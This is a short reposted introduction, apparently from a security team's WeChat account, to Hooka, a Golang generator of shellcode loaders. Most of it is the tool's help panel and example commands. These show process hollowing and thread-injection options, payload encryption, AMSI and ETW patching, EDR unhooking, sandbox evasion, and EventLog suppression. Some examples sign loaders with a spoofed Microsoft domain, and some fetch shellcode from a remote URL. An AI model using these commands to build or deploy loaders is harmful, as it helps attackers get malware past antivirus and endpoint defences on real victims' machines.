01 Project address
https://github.com/D3Ext/Hooka
02 Project introduction
Hooka can generate shellcode loaders with a variety of features. It also builds on other tools such as BokuLoader, Freeze or Shhhloader, and tries to implement additional evasion features. Why Golang? Although it is not the ideal language for malware development, it is well suited for testing purposes. Obviously, if you want something professional and foolproof, you should write your own loader in C++, C# or a similar language.
Usage of Hooka:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
-f, --format string format of the payload to generate (available: exe, dll) (default exe)
EXECUTION:
--proc string process to spawn (in suspended state) when needed for given execution technique (default notepad.exe)
--exec string technique used to load shellcode (default "SuspendedProcess"):
SuspendedProcess
ProcessHollowing
NtCreateThreadEx
EtwpCreateEtwThread
NtQueueApcThreadEx
No-RWX
AUXILIARY:
-a, --arch string architecture of the loader to generate (default amd64)
-c, --cert string certificate to sign generated loader with (i.e. cert.pfx)
-d, --domain string domain used to sign loader (i.e. www.microsoft.com)
ENCODING:
--enc string encrypts shellcode using given algorithm (available: aes, 3des, rc4, xor) (default none)
--sgn use Shikata Ga Nai to encode generated loader (it must be installed on path)
--strings obfuscate strings using Caesar cipher
EVASION:
--unhook string unhooking technique to use (available: full, peruns)
--sandbox enable sandbox evasion
--no-amsi don't patch AMSI
--no-etw don't patch ETW
--hashing use hashes to retrieve function pointers
--user string proceed only when the user running the loader is the expected (i.e. DESKTOP-E1D6G0Aadmin)
--computername string proceed only when the computer name is the expected (i.e. DESKTOP-E1D6G0A)
--acg enable ACG Guard to prevent AV/EDR from modifying existing executable code
--blockdlls prevent non-Microsoft signed DLLs from injecting in child processes
--phantom suspend EventLog threads using Phant0m technique. High privileges needed, otherwise loader skips this step
--sleep delay shellcode execution using a custom sleep function
EXTRA:
--calc use a calc.exe shellcode to test loader capabilities (don't provide input file)
--compress compress generated loader using Golang compiler and UPX if it's installed
-r, --rand use a random set of parameters to create a random loader (just for testing purposes)
-v, --verbose enable verbose to print extra information
-h, --help print help panel
Examples:
hooka -i shellcode.bin -o loader.exe
hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
$ hooka_linux_amd64 -i shellcode.bin -o loader.exe
$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll
$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
$ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0Atom" --computername "DESKTOP-E1D6G0A" --compress --strings
Originally published on the WeChat official account (GSDK安全团队): Hooka, a multi-feature shellcode loader generator